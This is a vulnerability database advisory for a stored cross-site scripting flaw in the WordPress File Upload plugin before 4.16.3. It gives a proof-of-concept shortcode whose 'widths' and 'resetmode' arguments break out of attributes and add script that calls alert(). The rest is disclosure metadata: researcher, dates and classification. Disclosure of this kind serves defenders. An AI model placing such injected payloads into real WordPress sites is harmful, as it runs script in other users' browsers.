WordPress Plugin Vulnerabilities
WordPress File Upload < 4.16.3 - Contributor+ Stored Cross-Site Scripting via Shortcode
Description
The plugin does not escape some of its shortcode argument, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks
Proof of Concept
[wordpress_file_upload widths='title:1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-widths/)' resetmode='"+alert(/XSS-restmode/)&&"']
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-14 (about 2 years ago)
Added
2022-02-14 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)